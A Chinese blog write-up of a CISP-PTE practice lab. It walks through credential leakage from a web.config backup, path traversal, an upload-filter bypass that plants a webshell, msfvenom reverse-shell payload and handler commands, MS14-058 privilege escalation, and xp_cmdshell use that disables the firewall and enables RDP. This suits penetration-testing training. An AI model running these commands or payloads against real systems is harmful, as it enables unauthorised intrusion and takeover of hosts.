CISP-PTE靶机
|
web安全

793 字
|
7 分钟
本文最后更新于73 天前,其中的信息可能已经过时。

一、信息收集

正常扫描nmap -sS 192.168.18.145 -T4 发现只开放了一个sql-server 随即全端口扫描

访问网站

御剑扫描完发现有web.config

二、解题步骤

访问首页

看看有没有信息泄露

在网络安全和渗透测试中,Git文件泄露是一个重要的考察点,因为它可能导致敏感信息(如源代码、配置文件、密码等)的暴露。

手动检查的方法为url/.git ,这里无法访问但是提示了目标为iis

iis默认配置文件为web.config看看有没有备份文件

http://192.168.18.145:27689/web.config.bak

成功下载并访问,这里把数据库信息显示了出来

连接数据库

查询到密码

登录得到key1

发现目标存在着注入,但是我们已经连接上数据库意义不大,尝试写入一句话木马,或者oshell,尝试失败

这里选择常规的文件上传,测试奇怪后缀也被拦,判断为白名单

这里想尝试文件包含图片马,然后默认aspx文件本身就是一个一句话木马,但是被误导了一直找到下载文件的接口去

192.168.18.145:27689/admin/file_down.aspx?file=638596652953750000-111111111.jpg

附:这里通过网上wp发现fuzz之后最终回溯两层目录到web根目录并下载web.config

192.168.18.145:27689/admin/file_down.aspx?file=../../web.cofig

转变思路观察到文件说明上传剪切后缀

经过测试 配合上时间戳后 文件名设置八位刚好jpg被隐藏

上传一句话木马

最后峰回路转在这里发现文件上传路径,真正的文件在这里,不应该去下载文件的,刚上传文件什么的存在这个路径下面。找错了思路,在这里把那个aspx文件下载下来,并且能看到里面的密码,找到该文件的真实位置

蚁剑连接上去自己上传的马子

成功得到key2

或者直接使用这个木马里面就是一句话木马

手工法

这里登录进来发现数据库的账号密码

查询到key.txt,得到key3

msf法

msf上线

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.130 LPORT=8848 -f exe -o 1.exe
msf6 exploit(multi/hams/steamed) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf6 exploit(multi/handler) > set PORT 8848
LPORT => 8848
msf6 exploit(multi/handler) > exploit

通过剑蚁上传到靶机后,通过虚拟终端shell来运行程序

成功上线后,使用bg维持会话的同时继续执行其他模块,使用14_058提权

bg
search ms14_058
use 0
set seesion 1
set LPORT
set LHOST
run

提权成功

解密

开启远程桌面
meterpreter > run post/windows/manage/enable_rdp

发现开启不了跟着网上的教程走一下msf版本sa提权

msf6 auxiliary(admin/mssql/mssql_exec) > set usname sa
usname => sa
msf6 auxiliary(admin/mssql/mssql_exec) > set usname sa
usname => sa
msf6 auxiliary(admin/mssql/mssql_exec) > set password cisp-pte@sa
password => cisp-pte@sa
msf6 auxiliary(admin/mssql/mssql_exec) > set RHOSTS 192.168.18.145
RHOSTS => 192.168.18.145
msf6 auxiliary(admin/mssql/mssql_exec) > set RPORT 1433
RPORT => 1433
msf6 auxiliary(admin/mssql/mssql_exec) > set CMD cmd.exe /c "netsh firewall set opmode disable"
CMD => cmd.exe /c netsh firewall set opmode disable
msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against 192.168.18.145

[*] 192.168.18.145:1433 - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c netsh firewall set opmode disable'

远连成功

附一个wmic法

开启3389

wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1

觉得有帮助可以投喂下博主哦~感谢!
作者:明弟有理想
版权声明: 本站所有文章,如无特殊说明或标注,均为本站原创发布。转载请注明文章地址及作者。
如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
文章声明:
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任,本人坚决反对利用文章内容进行恶意攻击行为,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全,本文内容未隐讳任何个人、群体、公司。请注意,本文并非文学作品,请勿过度理解。请大家自觉遵守《网络安全法》,感谢您的理解与支持!
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

																

							
							
						

															
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
DC-2靶机上了解和练习WordPress框架

							
							

							
SSRF内网打穿相关姿势

							
							

							
文件包含的一些getshell姿势

							
							

							
Rce脚本自动化&批量

							
							

							
beescms注入